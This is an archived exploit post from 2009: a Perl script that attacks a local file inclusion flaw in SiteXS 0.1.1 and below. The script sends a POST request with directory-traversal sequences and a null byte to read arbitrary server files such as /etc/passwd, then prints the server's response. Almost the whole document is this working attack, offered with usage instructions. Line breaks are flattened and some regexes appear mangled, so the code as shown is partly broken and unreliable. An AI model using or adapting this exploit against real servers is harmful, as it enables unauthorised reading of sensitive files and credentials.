sitexs-lfi.txt
Posted on 28 January 2009
# --+++==========================================================+++-- # --+++====== SiteXS <= 0.1.1 Local File Inclusion Exploit ======+++-- # --+++==========================================================+++-- #!/usr/bin/perl use strict; use warnings; use IO::Socket; sub usage () { die " SiteXS <= 0.1.1 Local File Inclusion Exploit". " [+] Author : darkjoker". " [+] Site : http://darkjoker.net23.net". " [+] Download: http://heanet.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz". " [+] Usage : perl ${0} <hostname> <path> <file>". " [+] Ex. : perl ${0} localhost /SiteXS /etc/passwd". " [+] Notes : Have fun "; } my ($host, $path, $file) = @ARGV; usage if (!$file); my $sock = new IO::Socket::INET ( PeerHost => $host, PeerPort => 80, Proto => "tcp", ); my $up = "../"x10; $file =~ s/^/// if ($file =~ /^//); my $varz = "type=${up}${file}%00"; my $post = "POST ${path}/post.php HTTP/1.1 ". "Host: ${host} ". "Connection: Close ". "Content-Type: application/x-www-form-urlencoded ". "Content-Length: " . length ($varz) . " ". $varz; print $sock $post; my $w = 0; while (<$sock>) { $w = 1 if ($w < 0); $w = -1 if ($_ =~ /Content-Type: text/html/); $w = 0 if ($_ =~ /<br />/); print $_ if ($w == 1); } print " "; close ($sock);
